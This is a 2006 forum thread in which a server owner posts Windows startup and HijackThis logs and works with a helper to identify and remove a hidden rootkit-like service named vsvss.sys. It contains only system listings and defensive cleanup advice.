--------------------------------------------------

Enumerating Windows NT/2000/XP services

Adaptec SCSI RAID Miniport Driver: system32\drivers\aac.sys (system)
Microsoft ACPI Driver: system32\DRIVERS\ACPI.sys (system)
Application Experience Lookup Service: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
AFD Networking Support Environment: \SystemRoot\System32\drivers\afd.sys (system)
Alerter: %SystemRoot%\system32\svchost.exe -k LocalService (disabled)
Application Layer Gateway Service: %SystemRoot%\System32\alg.exe (manual start)
Application Management: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
ASP.NET State Service: %SystemRoot%\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe (manual start)
avast! iAVS4 Control Service: "C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe" (autostart)
RAS Asynchronous Media Driver: system32\DRIVERS\asyncmac.sys (manual start)
Standard IDE/ESDI Hard Disk Controller: system32\DRIVERS\atapi.sys (system)
ati2mpad: system32\DRIVERS\ati2mpad.sys (manual start)
ATM ARP Client Protocol: system32\DRIVERS\atmarpc.sys (manual start)
Windows Audio: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Audio Stub Driver: system32\DRIVERS\audstub.sys (manual start)
avast! Antivirus: "C:\Program Files\Alwil Software\Avast4\aswServ.exe" (autostart)
avast! Mail Scanner: "C:\Program Files\Alwil Software\Avast4\aswMaiSv.exe" /service (manual start)
avast! Web Scanner: "C:\Program Files\Alwil Software\Avast4\aswWebSv.exe" /service (manual start)
Backup Exec Remote Agent for Windows Servers: "C:\Program Files\VERITAS\Backup Exec\RANT\beremote.exe" (autostart)
Background Intelligent Transfer Service: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Computer Browser: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
CCDed: c:\webcc\ccded\ccded.exe (manual start)
CD-ROM Driver: system32\DRIVERS\cdrom.sys (system)
Indexing Service: %SystemRoot%\system32\cisvc.exe (disabled)
ClipBook: %SystemRoot%\system32\clipsrv.exe (disabled)
Cluster Disk Driver: system32\DRIVERS\ClusDisk.sys (disabled)
COM+ System Application: C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} (manual start)
CRC Disk Filter Driver: system32\DRIVERS\crcdisk.sys (system)
Cryptographic Services: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
MailMax 5.5 - DataMaxDB .NET: C:\Program Files\MailMax5\DataMaxDB.exe (autostart)
DCOM Server Process Launcher: %SystemRoot%\system32\svchost.exe -k DcomLaunch (autostart)
Distributed File System: %SystemRoot%\system32\Dfssvc.exe (autostart)
DfsDriver: system32\drivers\Dfs.sys (system)
DHCP Client: %SystemRoot%\system32\svchost.exe -k NetworkService (autostart)
Disk Driver: system32\DRIVERS\disk.sys (system)
Logical Disk Manager Administrative Service: %SystemRoot%\System32\dmadmin.exe /com (manual start)
dmboot: System32\drivers\dmboot.sys (disabled)
Logical Disk Manager Driver: System32\drivers\dmio.sys (system)
dmload: System32\drivers\dmload.sys (system)
Logical Disk Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
DNS Server: %SystemRoot%\System32\dns.exe (disabled)
DNS Client: %SystemRoot%\system32\svchost.exe -k NetworkService (autostart)
Intel(R) PRO/1000 Adapter Driver: system32\DRIVERS\e1000325.sys (manual start)
Error Reporting Service: %SystemRoot%\System32\svchost.exe -k WinErr (autostart)
Event Log: %SystemRoot%\system32\services.exe (autostart)
COM+ Event System: C:\WINDOWS\system32\svchost.exe -k netsvcs (autostart)
Floppy Disk Controller Driver: system32\DRIVERS\fdc.sys (manual start)
Floppy Disk Driver: system32\DRIVERS\flpydisk.sys (manual start)
FltMgr: system32\drivers\fltmgr.sys (system)
Volume Manager Driver: system32\DRIVERS\ftdisk.sys (system)
Generic Packet Classifier: system32\DRIVERS\msgpc.sys (manual start)
Help and Support: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
HID Input Service: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Microsoft HID Class Driver: system32\DRIVERS\hidusb.sys (manual start)
MailMax 5.5 - HouseKeeping: C:\Program Files\MailMax5\HouseKeep.exe (autostart)
HTTP: System32\Drivers\HTTP.sys (manual start)
HTTP SSL: C:\WINDOWS\system32\lsass.exe (autostart)
i8042 Keyboard and PS/2 Mouse Port Driver: system32\DRIVERS\i8042prt.sys (system)
IIS Admin Service: C:\WINDOWS\system32\inetsrv\inetinfo.exe (autostart)
CD-Burning Filter Driver: system32\DRIVERS\imapi.sys (system)
IMAPI CD-Burning COM Service: C:\WINDOWS\system32\imapi.exe (disabled)
MailMax 5.5 - Imap Service: C:\Program Files\MailMax5\IMAPMax.exe (autostart)
IntelIde: system32\DRIVERS\intelide.sys (system)
Intel Processor Driver: system32\DRIVERS\intelppm.sys (manual start)
IPv6 Windows Firewall Driver: system32\drivers\ip6fw.sys (manual start)
IP Traffic Filter Driver: system32\DRIVERS\ipfltdrv.sys (manual start)
IP in IP Tunnel Driver: system32\DRIVERS\ipinip.sys (manual start)
IP Network Address Translator: system32\DRIVERS\ipnat.sys (manual start)
IPSEC driver: system32\DRIVERS\ipsec.sys (system)
IR Enumerator Service: system32\DRIVERS\irenum.sys (manual start)
PnP ISA/EISA Bus Driver: system32\DRIVERS\isapnp.sys (system)
Intersite Messaging: %SystemRoot%\System32\ismserv.exe (disabled)
Keyboard Class Driver: system32\DRIVERS\kbdclass.sys (system)
Keyboard HID Driver: system32\DRIVERS\kbdhid.sys (system)
Kerberos Key Distribution Center: %SystemRoot%\System32\lsass.exe (disabled)
Server: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Workstation: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
License Logging: %SystemRoot%\System32\llssrv.exe (disabled)
TCP/IP NetBIOS Helper: %SystemRoot%\system32\svchost.exe -k LocalService (autostart)
Messenger: %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
NetMeeting Remote Desktop Sharing: C:\WINDOWS\system32\mnmsrvc.exe (disabled)
Mouse Class Driver: system32\DRIVERS\mouclass.sys (system)
Mouse HID Driver: system32\DRIVERS\mouhid.sys (manual start)
WebDav Client Redirector: system32\DRIVERS\mrxdav.sys (manual start)
MRXSMB: system32\DRIVERS\mrxsmb.sys (system)
Distributed Transaction Coordinator: C:\WINDOWS\system32\msdtc.exe (autostart)
Windows Installer: C:\WINDOWS\system32\msiexec.exe /V (manual start)
Microsoft Search: "C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe" (autostart)
Microsoft System Management BIOS Driver: system32\DRIVERS\mssmbios.sys (manual start)
MSSQLSERVER: C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe (autostart)
MSSQLServerADHelper: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe (manual start)
Remote Access NDIS TAPI Driver: system32\DRIVERS\ndistapi.sys (manual start)
NDIS Usermode I/O Protocol: system32\DRIVERS\ndisuio.sys (manual start)
Remote Access NDIS WAN Driver: system32\DRIVERS\ndiswan.sys (manual start)
NetBIOS Interface: system32\DRIVERS\netbios.sys (system)
NetBios over Tcpip: system32\DRIVERS\netbt.sys (system)
Network DDE: %SystemRoot%\system32\netdde.exe (disabled)
Network DDE DSDM: %SystemRoot%\system32\netdde.exe (disabled)
Net Logon: %SystemRoot%\system32\lsass.exe (manual start)
Network Connections: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Network Location Awareness (NLA): %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
File Replication: %SystemRoot%\system32\ntfrs.exe (manual start)
NT LM Security Support Provider: %SystemRoot%\system32\lsass.exe (manual start)
Removable Storage: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
Parallel port driver: system32\DRIVERS\parport.sys (manual start)
Parvdm: system32\DRIVERS\parvdm.sys (autostart)
PCI Bus Driver: system32\DRIVERS\pci.sys (system)
Plug and Play: %SystemRoot%\system32\services.exe (autostart)
IPSEC Services: %SystemRoot%\system32\lsass.exe (autostart)
MailMax 5.5 - Pop3 Service: C:\Program Files\MailMax5\PopMax.exe (autostart)
WAN Miniport (PPTP): system32\DRIVERS\raspptp.sys (manual start)
Processor Driver: system32\DRIVERS\processr.sys (manual start)
Protected Storage: %SystemRoot%\system32\lsass.exe (autostart)
Direct Parallel Link Driver: system32\DRIVERS\ptilink.sys (manual start)
MailMax 5.5 - Outbound Queue Service: C:\Program Files\MailMax5\QueueMax.exe (autostart)
Remote Access Auto Connection Driver: system32\DRIVERS\rasacd.sys (system)
Remote Access Auto Connection Manager: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
WAN Miniport (L2TP): system32\DRIVERS\rasl2tp.sys (manual start)
Remote Access Connection Manager: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
Remote Access PPPOE Driver: system32\DRIVERS\raspppoe.sys (manual start)
Direct Parallel: system32\DRIVERS\raspti.sys (manual start)
Rdbss: system32\DRIVERS\rdbss.sys (system)
RDPCDD: System32\DRIVERS\RDPCDD.sys (system)
Terminal Server Device Redirector Driver: system32\DRIVERS\rdpdr.sys (manual start)
Remote Desktop Help Session Manager: C:\WINDOWS\system32\sessmgr.exe (manual start)
Digital CD Audio Playback Filter Driver: system32\DRIVERS\redbook.sys (system)
Routing and Remote Access: %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
Remote Registry: %SystemRoot%\system32\svchost.exe -k regsvc (manual start)
Remote Procedure Call (RPC) Locator: %SystemRoot%\system32\locator.exe (manual start)
Remote Procedure Call (RPC): %SystemRoot%\system32\svchost.exe -k rpcss (autostart)
Resultant Set of Policy Provider: %SystemRoot%\system32\RSoPProv.exe (manual start)
Special Administration Console Helper: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Security Accounts Manager: %SystemRoot%\system32\lsass.exe (autostart)
Smart Card: %SystemRoot%\System32\SCardSvr.exe (manual start)
Task Scheduler: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Simple DNS Plus: C:\Program Files\Simple DNS Plus\sdnsmain.exe (autostart)
Secdrv: system32\DRIVERS\secdrv.sys (manual start)
Secondary Logon: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
System Event Notification: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Serenum Filter Driver: system32\DRIVERS\serenum.sys (manual start)
Serial port driver: system32\DRIVERS\serial.sys (system)
Serv-U FTP Server: C:\Program Files\Serv-U\ServUDaemon.exe (autostart)
Windows Firewall/Internet Connection Sharing (ICS): %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
Shell Hardware Detection: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
MailMax 5.5 - SMTP Service: C:\Program Files\MailMax5\SMTPMax5.exe (autostart)
Print Spooler: %SystemRoot%\system32\spoolsv.exe (autostart)
SQLSERVERAGENT: C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe (autostart)
Srv: system32\DRIVERS\srv.sys (manual start)
Windows Image Acquisition (WIA): %SystemRoot%\system32\svchost.exe -k imgsvc (disabled)
Software Bus Driver: system32\DRIVERS\swenum.sys (manual start)
Microsoft Software Shadow Copy Provider: %SystemRoot%\System32\svchost.exe -k swprv (manual start)
Performance Logs and Alerts: %SystemRoot%\system32\smlogsvc.exe (manual start)
Telephony: %SystemRoot%\System32\svchost.exe -k tapisrv (manual start)
TCP/IP Protocol Driver: system32\DRIVERS\tcpip.sys (system)
Terminal Device Driver: system32\DRIVERS\termdd.sys (autostart)
Terminal Services: %SystemRoot%\System32\svchost.exe -k termsvcs (autostart)
Themes: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
Telnet: C:\WINDOWS\system32\tlntsvr.exe (disabled)
Distributed Link Tracking Server: %SystemRoot%\system32\svchost.exe -k netsvcs (disabled)
Distributed Link Tracking Client: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Terminal Services Session Directory: %SystemRoot%\System32\tssdis.exe (disabled)
Windows User Mode Driver Framework: C:\WINDOWS\system32\wdfmgr.exe (manual start)
Microcode Update Driver: system32\DRIVERS\update.sys (manual start)
Upload Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Uninterruptible Power Supply: %SystemRoot%\System32\ups.exe (manual start)
Urchin Scheduler: C:\Program Files\Urchin\bin\urchind.exe (autostart)
Urchin Webserver: C:\Program Files\Urchin\bin\urchinwebd.exe --ntservice (autostart)
Microsoft USB Generic Parent Driver: system32\DRIVERS\usbccgp.sys (manual start)
Microsoft USB Standard Hub Driver: system32\DRIVERS\usbhub.sys (manual start)
Microsoft USB Universal Host Controller Miniport Driver: system32\DRIVERS\usbuhci.sys (manual start)
Virtual Disk Service: %SystemRoot%\System32\vds.exe (manual start)
VGA Display Controller.: \SystemRoot\System32\drivers\vga.sys (system)
Storage volumes: system32\DRIVERS\volsnap.sys (system)
Volume Shadow Copy: %SystemRoot%\System32\vssvc.exe (manual start)
Distributed Transaction Coordinator Control: \??\c:\windows\system32\dllcache\vsvss.sys (manual start)
Windows Time: %SystemRoot%\system32\svchost.exe -k LocalService (autostart)
World Wide Web Publishing Service: %SystemRoot%\System32\svchost.exe -k iissvcs (autostart)
Remote Access IP ARP Driver: system32\DRIVERS\wanarp.sys (manual start)
WebClient: %SystemRoot%\system32\svchost.exe -k LocalService (disabled)
WinHTTP Web Proxy Auto-Discovery Service: %SystemRoot%\system32\svchost.exe -k LocalService (manual start)
Windows Management Instrumentation: %systemroot%\system32\svchost.exe -k netsvcs (autostart)
Network Load Balancing: system32\DRIVERS\wlbs.sys (manual start)
Portable Media Serial Number Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Windows Management Instrumentation Driver Extensions: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
WMI Performance Adapter: C:\WINDOWS\system32\wbem\wmiapsrv.exe (manual start)
Automatic Updates: %systemroot%\system32\svchost.exe -k netsvcs (autostart)
Wireless Configuration: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
Network Provisioning Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)

--------------------------------------------------

Enumerating Windows NT logon/logoff scripts:
*No scripts set to run*

Windows NT checkdisk command:
BootExecute = autocheck autochk *

Windows NT 'Wininit.ini':
PendingFileRenameOperations: *Registry value not found*

--------------------------------------------------

Enumerating ShellServiceObjectDelayLoad items:

PostBootReminder: C:\WINDOWS\system32\SHELL32.dll
CDBurn: C:\WINDOWS\system32\SHELL32.dll
WebCheck: C:\WINDOWS\system32\webcheck.dll
SysTray: C:\WINDOWS\system32\stobject.dll

--------------------------------------------------
Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

*Registry key not found*

End of report, 31,930 bytes
Report generated in 0.266 seconds


----------



## Gunny123 (Mar 29, 2006)

Are there any problems with disabling the windows firewall/internet connection sharing service?

Also, would anyone recommend/not recommend modifying the advanced tcp/ip options filtering? And just add the ports I need? I'm hesitant to do this because I don't want to get kicked out because I use remote desktop and don't want the web server, etc to stop working for even a short amount of time.


----------



## dvk01 (Dec 14, 2002)

this is the service responsible
c:\windows\system32\dllcache\vsvss.sys

let's have a normal HJT log & also


Download *WinPFind*
*Right Click* the Zip Folder and Select "*Extract All*"
Extract it somewhere you will remember like the *Desktop*
Dont do anything with it yet!

Reboot into Safe Mode
Restart your computer and as soon as it starts booting up again continuously tap F8. A menu should come up where you will be given the option to enter Safe Mode.

Doubleclick *WinPFind.exe*
Click "* Configure Scan Options*"
Select " *Run Add ONs*" and then select *ALL* the options in the box below it, Press Apply 
Now Click "*Start Scan*"
*It will scan the entire System, so please be patient!*
Once the Scan is Complete
Reboot back to Normal Mode!
Go to the *WinPFind folder*
Locate *WinPFind.txt*
Place those results in the next post! It will be too big to post so you will need to attach it to your reply


----------



## dvk01 (Dec 14, 2002)

please do this for me so I can see what the service interacts with

please go to http://www.thespykiller.co.uk/forum/index.php?board=1.0 and upload these files so I can examine them and distribute them to antivirus companies.
Just press new topic, fill in the needed details and just give a link to your post here & then press the browse button and then navigate to & select the files on your computer, If there is more than 1 file then press the more attachments button for each extra file and browse and select etc and then when all the files are listed in the windows press send to upload the files ( do not post HJT logs there as they will not get dealt with)

Files to submit:

c:\windows\system32\dllcache\vsvss.sys


----------



## Gunny123 (Mar 29, 2006)

You are right on the money. As soon as I saw that vsvss.sys I knew that was it. I saw that hiding itself and a name was not shown.

Also, I see an active connection to reality-board.de.

However, I can't do what you asked because this is a dedicated server and I don't have console access. I noticed you are just looking for the txt file though and it doesn't actually clean it up, is there any way you don't need this? I can try to have someone do this after hours in the data center, if I'm lucky. It's not a managed dedicated server.

Is this the "normal" output you are looking for? If not, can you explain how I get the output you are looking for?

StartupList report, 3/29/2006, 5:29:50 AM
StartupList version: 1.52.2
Started from : C:\Installed\HijackThis.EXE
Detected: Windows 2003 SP1 (WinNT 5.02.3790)
Detected: Internet Explorer v6.00 SP1 (6.00.3790.1830)
* Using default options
==================================================

Running processes:

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\msdtc.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe
C:\Program Files\Simple DNS Plus\sdnsmain.exe
C:\Program Files\Serv-U\ServUDaemon.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Urchin\bin\urchind.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\MailMax5\DataMaxDB.exe
C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
C:\WINDOWS\System32\svchost.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\Program Files\MailMax5\HouseKeep.exe
C:\Program Files\MailMax5\IMAPMax.exe
C:\Program Files\MailMax5\PopMax.exe
C:\Program Files\MailMax5\QueueMax.exe
C:\Program Files\MailMax5\SMTPMax5.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\explorer.exe
C:\Installed\HijackThis.exe

--------------------------------------------------

Checking Windows NT UserInit:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Simple DNS Plus = C:\Program Files\Simple DNS Plus\sdnsplus.exe -s
avast! = C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*

Shell & screensaver key from Registry:

Shell=Explorer.exe
SCRNSAVE.EXE=C:\WINDOWS\System32\logon.scr
drivers=*Registry value not found*

Policies Shell key:

HKCU\..\Policies: Shell=*Registry key not found*
HKLM\..\Policies: Shell=*Registry value not found*

--------------------------------------------------

Enumerating Download Program Files:

[Housecall ActiveX 6.5]
InProcServer32 = C:\WINDOWS\Downloaded Program Files\Housecall_ActiveX.dll
CODEBASE = http://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab

[Shockwave Flash Object]
InProcServer32 = C:\WINDOWS\system32\Macromed\Flash\Flash8a.ocx
CODEBASE = http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

--------------------------------------------------

Enumerating ShellServiceObjectDelayLoad items:

PostBootReminder: C:\WINDOWS\system32\SHELL32.dll
CDBurn: C:\WINDOWS\system32\SHELL32.dll
WebCheck: C:\WINDOWS\system32\webcheck.dll
SysTray: C:\WINDOWS\system32\stobject.dll

--------------------------------------------------
End of report, 4,509 bytes
Report generated in 0.187 seconds


----------



## Gunny123 (Mar 29, 2006)

dvk01 said:


> please do this for me so I can see what the service interacts with
> 
> please go to http://www.thespykiller.co.uk/forum/index.php?board=1.0 and upload these files so I can examine them and distribute them to antivirus companies.
> Just press new topic, fill in the needed details and just give a link to your post here & then press the browse button and then navigate to & select the files on your computer, If there is more than 1 file then press the more attachments button for each extra file and browse and select etc and then when all the files are listed in the windows press send to upload the files ( do not post HJT logs there as they will not get dealt with)
> ...


It looks like that specific .sys file is hidden. However, I did see an exe, i.e., vsvss.exe, and also it had a plain text ini file that had hacker type crap in there like ports, file names, etc.

Should I post these?


----------



## Gunny123 (Mar 29, 2006)

Good news! While it's not fixed completely, I think I got rid of some of it.

Basically, what got me somewhere, is I set up IPSec I believe it's called. It's where you go to the tcp/ip properties, advanced, and set up tcp/ip filters. I set up the filters to only allow the ports I needed.

Then, I rebooted. All of the previously hidden files and services were now visible! Also, all of the files that it works with in the system32\wbem directory were visible also. My anti-virus software was also able to detect multiple different viruses. After I saw this, I stopped the services, killed the processes, got rid of the registry settings for the services, moved the files and renamed the files to my bad directory. I then got all of the file names from the batch file, did a search, cut and pasted them into my bad directory, renaming also. I got their rar file (samclt.dll) and their unrar.exe, and was able to isolate these files as well.

My AV software popped up a message when opening and said there was a certain virus that it needed to do a BOOT TIME scan, this is a server in a data center so I hesitated but did it anyway. It went a lot faster than I thought it would, only about 5 or 10 mins.

However, IT'S NOT FIXED completely. When it booted back up, I went through, and the files weren't there, the services were no longer there, the registry settings weren't there, etc, etc.

However, the batch file was in the windows\temp directory, and WAS run. I know this because windows firewall was enabled again. However, the good news is, because I was able to get their zip file and all of the other files, their windows usernames weren't created, the services weren't started, etc. Basically, everything else in that batch file needs an external file in their rar file except their windows firewall changes because that uses netsh commands.

The bad news is I don't think the boot time scan got rid of it completely or else the batch file wouldn't have been run. Using autoruns I got rid of the startup for the vsvss.sys, and I don't see it in the auto runs anymore, so at this point not sure what to do.

Also, I saw and still see this service named "NT Service" with a file name of: C:\WINDOWS\system32\ntkrnlp.exe. Attributes are HSA. Weird thing is, the startup type is automatic but it's not running. I wonder if this is the culprit. 

Should I try removing it?
Any ideas?


----------



## dvk01 (Dec 14, 2002)

you have given me a startup list and we really need a HJT log as that shows a few different things

go to here and download 'Hijack This!' self installer. Save it to the desktop or other suitable place. * DO NOT just press run from the website* Double click on the file and it will install to C:\program files\hijackthis and create an entry in the start menu and an optional shortcut on desktop. 
Click on the entry in start menu or on the desktop to run HijackThis
Click the "Scan" button, when the scan is finished the scan button will become "Save Log" click that and save the log. 
Go to where you saved the log and click on "Edit > Select All" then click on "Edit > Copy" then Paste the log back here in a reply.
It will possibly show issues deserving our attention, but most of what it lists will be harmless or even required, 
so *do NOT fix anything yet.*
Someone here will be happy to help you analyze the results.

then run wpfind in normal mode

however to clean this successfully you are going to have to take it off line otherwise it will immediately reinfect itself again

otherwise it is like putting a sticking plaster on a broken leg

when you have a chance, & I suggest fairly quickly, take it off line and do the scans and also do a scan with Rootkit Revealer or BlackLight as I strongly suspect a rootkit has been installed via a recently discovered windows vulnerability


----------



## Gunny123 (Mar 29, 2006)

Oh, sorry, I didn't think that other info was needed and the start up was what you guys wanted.

Anyway, here it is:

Logfile of HijackThis v1.99.1
Scan saved at 11:37:45 AM, on 3/30/2006
Platform: Windows 2003 SP1 (WinNT 5.02.3790)
MSIE: Internet Explorer v6.00 SP1 (6.00.3790.1830)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\ewido anti-malware\ewidoctrl.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe
C:\Program Files\Simple DNS Plus\sdnsmain.exe
C:\Program Files\Serv-U\ServUDaemon.exe
C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Urchin\bin\urchind.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\Urchin\bin\urchinwebd.exe
C:\Program Files\MailMax5\DataMaxDB.exe
C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
C:\Program Files\MailMax5\PopMax.exe
C:\Program Files\MailMax5\QueueMax.exe
C:\Program Files\MailMax5\SMTPMax5.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\MailMax5\HouseKeep.exe
C:\Program Files\MailMax5\IMAPMax.exe
c:\windows\system32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
C:\WINDOWS\system32\scrnsave.scr
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\rdpclip.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Simple DNS Plus\sdnsgui.exe
C:\Program Files\ewido anti-malware\SecuritySuite.exe
C:\WINDOWS\explorer.exe
C:\Installed\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = res://shdoclc.dll/hardAdmin.htm
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://yahoo.com/
O4 - HKLM\..\Run: [Simple DNS Plus] C:\Program Files\Simple DNS Plus\sdnsplus.exe -s
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
O16 - DPF: {6E5A37BF-FD42-463A-877C-4EB7002E68AE} (Housecall ActiveX 6.5) - http://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab
O20 - Winlogon Notify: dimsntfy - C:\WINDOWS\SYSTEM32\dimsntfy.dll
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswWebSv.exe" /service (file missing)
O23 - Service: Backup Exec Remote Agent for Windows Servers (BackupExecAgentAccelerator) - VERITAS Software Corporation - C:\Program Files\VERITAS\Backup Exec\RANT\beremote.exe
O23 - Service: CCDed - - c:\webcc\ccded\ccded.exe
O23 - Service: MailMax 5.5 - DataMaxDB .NET (DataMaxDB) - SmartMax Software, Inc. - C:\Program Files\MailMax5\DataMaxDB.exe
O23 - Service: Event Log Reporting Service (evtlgs) - Unknown owner - C:\WINDOWS\system32\rwinstall.exe (file missing)
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido anti-malware\ewidoctrl.exe
O23 - Service: ewido security suite guard - ewido networks - C:\Program Files\ewido anti-malware\ewidoguard.exe
O23 - Service: MailMax 5.5 - HouseKeeping (HouseKeeping) - SmartMax Software, Inc. - C:\Program Files\MailMax5\HouseKeep.exe
O23 - Service: MailMax 5.5 - Imap Service (IMAPMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\IMAPMax.exe
O23 - Service: MailMax 5.5 - Pop3 Service (PopMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\PopMax.exe
O23 - Service: MailMax 5.5 - Outbound Queue Service (QueueMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\QueueMax.exe
O23 - Service: Simple DNS Plus (sdnsplus) - JH Software - C:\Program Files\Simple DNS Plus\sdnsmain.exe
O23 - Service: Serv-U FTP Server (Serv-U) - Rhino Software, Inc. +1(262) 560-9627 - C:\Program Files\Serv-U\ServUDaemon.exe
O23 - Service: MailMax 5.5 - SMTP Service (SMTPMax5) - SmartMax Software, Inc. - C:\Program Files\MailMax5\SMTPMax5.exe
O23 - Service: Urchin Scheduler (urchind) - Unknown owner - C:\Program Files\Urchin\bin\urchind.exe
O23 - Service: Urchin Webserver (UrchinWebserver) - Unknown owner - C:\Program Files\Urchin\bin\urchinwebd.exe

The screen saver looks a little suspicious, other than that, I don't think it would be in here because it was HIDING its process and hijack this, process explorer, etc, didn't show it. This one product called security task manager was able to show 3 hidden processes running though. It would also hide the actual files in windows explorer, registry keys, and so on.


----------



## dvk01 (Dec 14, 2002)

